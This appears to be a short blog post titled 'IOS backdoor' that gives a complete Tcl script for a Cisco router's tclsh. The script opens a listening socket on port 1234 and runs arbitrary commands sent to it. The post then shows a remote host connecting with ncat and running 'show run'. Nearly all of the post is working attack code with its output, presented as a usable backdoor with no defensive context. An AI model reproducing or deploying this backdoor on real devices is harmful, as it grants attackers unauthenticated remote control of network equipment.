IOS backdoor
TCL
Ejecución
Router#tclshRouter(tcl)#proc backdoor {port} {+>global shell loop+>set shell [socket -server bdsh $port]+>vwait loop+>close $shell+>}Router(tcl)#proc bdsh {socket ip port} {+>fconfigure $socket -buffering line+>puts -nonewline $socket "#"+>flush $socket+>fileevent $socket readable [list echo $socket]+>}Router(tcl)#proc echo {socket} {+>global loop+>if {![catch {gets $socket command}] && ![eof $socket]} {+>switch -exact -- $command {+>:exit { return [close $socket] }+>:stop { set loop end; return [close $socket] }+>default { execute $socket $command }+>}+>}+>}Router(tcl)#proc execute {socket command} {+>catch {eval "exec $command"} output+>if {[catch {puts $socket $output}]} {+>return [close $socket]+>} else {+>puts -nonewline $socket "#"+>flush $socket+>}+>}Router(tcl)#backdoor 1234
remote_host#ncat Router 1234#show run | i hostnamehostname Router #
No comments:
Post a Comment